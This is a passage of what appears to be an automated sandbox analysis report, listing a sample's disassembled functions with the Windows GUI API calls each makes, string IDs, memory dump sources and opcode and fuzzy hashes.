                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$Long
                                              • String ID:
                                              • API String ID: 847901565-0
                                              • Opcode ID: 1f383536d0eb5943c2e84ac9ad103fe7ad595bd4952420b5bedc86f547b35d89
                                              • Instruction ID: 3af832177729fe90cdb583587a0bf013be441373b525e424b34df98c482110cb
                                              • Opcode Fuzzy Hash: 1f383536d0eb5943c2e84ac9ad103fe7ad595bd4952420b5bedc86f547b35d89
                                              • Instruction Fuzzy Hash: DE11A2329012599FCB119F28CD04AEA3BA5BB453B1F118724F93AD72E0DB308D52EB50
                                              Function 00EB2099 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7b18fb7da3d6fd5452aa1071fc94af2832e76555eadfa1756053dd4bb9788d71
                                              • Instruction ID: 5e4eb0e9d1a307197c0e66a9809d0574522cdbfe1f77a09d66d7724d37353457
                                              • Opcode Fuzzy Hash: 7b18fb7da3d6fd5452aa1071fc94af2832e76555eadfa1756053dd4bb9788d71
                                              • Instruction Fuzzy Hash: CE01ADB220A21A7EF621267C6CC1FE7675DDF423B8F35272EF721B52D1EA608C409560
                                              Function 00EE22B7 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00EE22D7
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EE22E9
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EE22FF
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EE231A
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 8ad175f386b767570a7974dc648d70a611bb05ab157023a7dd65753b068867b7
                                              • Instruction ID: 5f411ea44acedcb3a3e95addf4ac34f8307e4b1c3e741c5c47e5623431b43535
                                              • Opcode Fuzzy Hash: 8ad175f386b767570a7974dc648d70a611bb05ab157023a7dd65753b068867b7
                                              • Instruction Fuzzy Hash: 8E11053A900229FFEB119FA5CD85F9DFBB8FB08754F211095EA00B7290D671AE10DB94
                                              Function 00F1A852 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E82441: GetWindowLongW.USER32(00000000,000000EB), ref: 00E82452
                                              • GetClientRect.USER32(?,?), ref: 00F1A890
                                              • GetCursorPos.USER32(?), ref: 00F1A89A
                                              • ScreenToClient.USER32(?,?), ref: 00F1A8A5
                                              • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 00F1A8D9
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Client$CursorLongProcRectScreenWindow
                                              • String ID:
                                              • API String ID: 4127811313-0
                                              • Opcode ID: 1011368b24c3d96c7bd8cb61254a512bc7190dcc2549cf16f98aba104ca6f9ec
                                              • Instruction ID: 19b5122a7a1a4c6e4a92139ba45f34739edd55260d31fff9fbf132817caea593
                                              • Opcode Fuzzy Hash: 1011368b24c3d96c7bd8cb61254a512bc7190dcc2549cf16f98aba104ca6f9ec
                                              • Instruction Fuzzy Hash: F4118532901119EFDF04EFA8C8859EE77B8FB05321F004455F912E3150D734AA82EBB2
                                              Function 00EEEA02 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00EEEA29
                                              • MessageBoxW.USER32(?,?,?,?), ref: 00EEEA5C
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00EEEA72
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00EEEA79
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                              • String ID:
                                              • API String ID: 2880819207-0
                                              • Opcode ID: ba9a97332a1cc9790409c1a5f436b2e358afbe39cb62dc22a208a21b384b88a1
                                              • Instruction ID: 9be2efa0a56ece26d812d4ac60cb886b21053a602eb3d0e06dc2f30abe431853
                                              • Opcode Fuzzy Hash: ba9a97332a1cc9790409c1a5f436b2e358afbe39cb62dc22a208a21b384b88a1
                                              • Instruction Fuzzy Hash: 4211087690035CBBD701AFA99C09ADB7FADAB47314F00822AF929F3390D6748D0497A0
                                              Function 00F18773 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00F18792
                                              • ScreenToClient.USER32(?,?), ref: 00F187AA
                                              • ScreenToClient.USER32(?,?), ref: 00F187CE
                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F187E9
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ClientRectScreen$InvalidateWindow
                                              • String ID:
                                              • API String ID: 357397906-0
                                              • Opcode ID: 2be7663046cb3801e2f54743dd50276f46de2a9d616d27ee3f0751b798d7cb6f
                                              • Instruction ID: c5bfc05e9c8c8b1adc010fe568c62132759afcf042b76fcdabc048917b247616
                                              • Opcode Fuzzy Hash: 2be7663046cb3801e2f54743dd50276f46de2a9d616d27ee3f0751b798d7cb6f
                                              • Instruction Fuzzy Hash: E21140B9D0020DEFDB41CFA8C884AEEBBB5FB08314F108166E915E3210D735AA559F50
                                              Function 00E82150 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSysColor.USER32(00000008), ref: 00E8216C
                                              • SetTextColor.GDI32(?,?), ref: 00E82176
                                              • SetBkMode.GDI32(?,00000001), ref: 00E82189
                                              • GetStockObject.GDI32(00000005), ref: 00E82191
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Color$ModeObjectStockText
                                              • String ID:
                                              • API String ID: 4037423528-0
                                              • Opcode ID: dabe0d22b7c8fa1bdf52e9104a31b86be7ad77d90a67aedf2945c02876dafdfb
                                              • Instruction ID: 47324066aafc941a2ab0c018cce170d75a343ce636252eae8420ddb0cc0398d9
                                              • Opcode Fuzzy Hash: dabe0d22b7c8fa1bdf52e9104a31b86be7ad77d90a67aedf2945c02876dafdfb
                                              • Instruction Fuzzy Hash: 13E09231280248BEEB215B74AC09BE87B31AB1233AF14C31DF7FE680E1C3724641AB10
                                              Function 00EDEBD6 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00EDEBD6
                                              • GetDC.USER32(00000000), ref: 00EDEBE0
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EDEC00
                                              • ReleaseDC.USER32(?), ref: 00EDEC21
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: a2935231639c9290c58ed5522999be3fe404280c756b422db48796dacbe6b6c4
                                              • Instruction ID: 8664ceee9334b9f8883828e0502c85a62fed3c8c8271f74336b6f86644da1d0e
                                              • Opcode Fuzzy Hash: a2935231639c9290c58ed5522999be3fe404280c756b422db48796dacbe6b6c4
                                              • Instruction Fuzzy Hash: 45E01AB0800209EFCF50AFA08808AADBBF1FB08310F12C44AE90EB7310CB385941AF00
                                              Function 00EDEBEA Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00EDEBEA
                                              • GetDC.USER32(00000000), ref: 00EDEBF4
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EDEC00
                                              • ReleaseDC.USER32(?), ref: 00EDEC21
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: 20b86809817e15eb989de872b3458c78ec8ea3e6be750e0f7b692ab1482e429b
                                              • Instruction ID: c17f090ddef86e2aaffc3615261102e30254cc077ddf5a21046a86679d336798
                                              • Opcode Fuzzy Hash: 20b86809817e15eb989de872b3458c78ec8ea3e6be750e0f7b692ab1482e429b
                                              • Instruction Fuzzy Hash: DCE092B5900209EFCF51AFA09908AADBBF5BB48311F16C449E95EA7354DB389A01AF10
                                              Function 00EAE60D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                              Download Yara Rule
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 00EAE69D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ErrorHandling__start
                                              • String ID: pow
                                              • API String ID: 3213639722-2276729525
                                              • Opcode ID: 7683a18a0737cd8eabf3130ade9e23ff97e1aae8b36ef6f2c7b7191e7ad4a5cf
                                              • Instruction ID: 166326d1077c4952c588c5a869f8aca0ae36c93d035dd5d6325574986ac49259
                                              • Opcode Fuzzy Hash: 7683a18a0737cd8eabf3130ade9e23ff97e1aae8b36ef6f2c7b7191e7ad4a5cf
                                              • Instruction Fuzzy Hash: 5A519C61A0A10696C711B718DF013EB3BE8AB95744F306D58F0D17A3F9EF349C86EA46
                                              Function 00E9A86C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #
                                              • API String ID: 0-1885708031
                                              • Opcode ID: 5ef28d917740d7064a8d26d87f316c0b017d68fe08574e62c655c3c3316bcd35
                                              • Instruction ID: e835d06066d370c40ec9707af11d6a19c158d7de3e3ef1d861d1243a8fd21eb8
                                              • Opcode Fuzzy Hash: 5ef28d917740d7064a8d26d87f316c0b017d68fe08574e62c655c3c3316bcd35
                                              • Instruction Fuzzy Hash: B6511131504246DFCF25EF28D480AFA77A1EF55318F296066E8A1BB3D0DA349D43CBA1
                                              Function 00F060A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper_wcslen
                                              • String ID: CALLARGARRAY
                                              • API String ID: 157775604-1150593374
                                              • Opcode ID: d077a55e2288957d1ce99a9ad122f312b3bed79736410d6c332f54c13cd9f6c7
                                              • Instruction ID: b30579bee2c5dad4f5d53544328c7274fcecd4657673e2736a805dfb6f954f4b
                                              • Opcode Fuzzy Hash: d077a55e2288957d1ce99a9ad122f312b3bed79736410d6c332f54c13cd9f6c7
                                              • Instruction Fuzzy Hash: 8641C271E002199FCB04EFA9C8819EEBBF5FF59720F155069E40AE7292D7709D81EB90
                                              Function 00F14E96 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00F14F7E
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F14F93
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: '
                                              • API String ID: 3850602802-1997036262
                                              • Opcode ID: eac4da535a43377c33755f4bdaacf8f6a5640bcd3ba2f240ea9a658320b72ee5
                                              • Instruction ID: dc694ad91b0a8141e923aa6fb5a36d8c31814cb00d1a61df3724430741b84ace
                                              • Opcode Fuzzy Hash: eac4da535a43377c33755f4bdaacf8f6a5640bcd3ba2f240ea9a658320b72ee5
                                              • Instruction Fuzzy Hash: 3A311975E0130A9FDB14CFA9C880BDA7BB5FF89314F10416AE905AB391D771A982DF90
                                              Function 00F1406F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E8771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E87759
                                                • Part of subcall function 00E8771B: GetStockObject.GDI32(00000011), ref: 00E8776D
                                                • Part of subcall function 00E8771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E87777
                                              • GetWindowRect.USER32(00000000,?), ref: 00F140D9
                                              • GetSysColor.USER32(00000012), ref: 00F140F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                              • String ID: static
                                              • API String ID: 1983116058-2160076837
                                              • Opcode ID: 31ca5fd0734e16fa2293e959015f4070b3521a199b90271c330cc23591a4a03f
                                              • Instruction ID: b792329b1c6460060f4389c77b4eaf2e2e3bd2332b33f5ac9da2b2eb4311a487
                                              • Opcode Fuzzy Hash: 31ca5fd0734e16fa2293e959015f4070b3521a199b90271c330cc23591a4a03f
                                              • Instruction Fuzzy Hash: 54113A72610209AFDB01DFA8CC45AFA7BF8FF09314F014915F955E3150E675E891EB60
                                              Function 00EE256E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                                • Part of subcall function 00EE4536: GetClassNameW.USER32(?,?,000000FF), ref: 00EE4559
                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00EE25DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 624084870-1403004172
                                              • Opcode ID: d4c15e2caa632c831e1ecbeddf2b205a8dd20b0a3d2426251a1587799afed8cf
                                              • Instruction ID: d6689834e363b707f2195f36c103eac3543923a60ed4a723bb6f604c5514840b
                                              • Opcode Fuzzy Hash: d4c15e2caa632c831e1ecbeddf2b205a8dd20b0a3d2426251a1587799afed8cf
                                              • Instruction Fuzzy Hash: 2601F57160026DABCB04FFA4CD11CFE77A8EF92310B041609A966B32D6EB30980C9751
                                              Function 00EE2468 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                                • Part of subcall function 00EE4536: GetClassNameW.USER32(?,?,000000FF), ref: 00EE4559
                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00EE24D6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 624084870-1403004172
                                              • Opcode ID: f289a53ccc1eafce7d28d454b164b24ae3865c54ce46630cd608ad7efb087bc6
                                              • Instruction ID: c2dd2463137dcdfaa298470a7abf51f47ed827b8f245b373a5bda856794172f4
                                              • Opcode Fuzzy Hash: f289a53ccc1eafce7d28d454b164b24ae3865c54ce46630cd608ad7efb087bc6
                                              • Instruction Fuzzy Hash: 3201F77160014DABDB14FBA1C812EFF77EC9F51340F14201A6916B72D6EA509E0CD771
                                              Function 00EE24EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                                • Part of subcall function 00EE4536: GetClassNameW.USER32(?,?,000000FF), ref: 00EE4559
                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00EE2558
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 624084870-1403004172
                                              • Opcode ID: daea56ca59ae0dcfcd96609cdf15d3b56e2343754ed80337fa8db01dc10d395c
                                              • Instruction ID: 284c7c7b15f1f99a723f20525fbca28d98ee0137c3ef582aba83d6e0f2bae6e8
                                              • Opcode Fuzzy Hash: daea56ca59ae0dcfcd96609cdf15d3b56e2343754ed80337fa8db01dc10d395c
                                              • Instruction Fuzzy Hash: 6901F2B164018DABCB10FBA1CA12AFF77EC9B11740F14201A7906B32C2EA20DE0D9672
                                              Function 00EE25F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                                • Part of subcall function 00EE4536: GetClassNameW.USER32(?,?,000000FF), ref: 00EE4559
                                              • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00EE2663
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
